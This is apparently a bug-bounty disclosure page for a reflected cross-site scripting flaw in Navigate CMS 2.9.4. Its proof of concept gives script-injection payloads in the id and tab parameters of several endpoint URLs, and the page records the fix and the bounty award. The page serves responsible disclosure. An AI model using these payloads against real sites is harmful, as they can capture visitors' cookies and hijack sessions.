Cross-site Scripting (XSS) - Reflected in navigatecms/navigate-cms


Reported on

Jan 30th 2022


Cross-Site Scripting is vulnerability which allows attackers to execute arbitrary javascript code in the browser of victim.

Proof of Concept

Parameter: id

Payload: <script>alert(document.cookie)</script>

Affected endpoints:

On Firefox browser, visit:

1 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3Cscript%3Ealert(%22xss-1%22)%3C/script%3E

2 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

3 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3CsCriPt%3Ealert(%22XSS-1%22)%3C/sCriPt%3E&tab=%3CsCriPt%3Ealert(%22XSS-2%22)%3C/sCriPt%3E


XSS alert will pop-up showing user cookie or xss-1.


This vulnerability is capable of capture the cookies of anyone that navigates to the vulnerable URL.



We are processing your report and will contact the navigatecms/navigate-cms team within 24 hours. 4 months ago
We created a GitHub Issue asking the maintainers to create a 4 months ago
Faisal Fs
4 months ago


@admin, it has been fixed.

Jamie Slome validated this vulnerability 4 months ago
Faisal Fs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on f9af8c 4 months ago
The fix bounty has been dropped
files.php#L298 has been validated
to join this conversation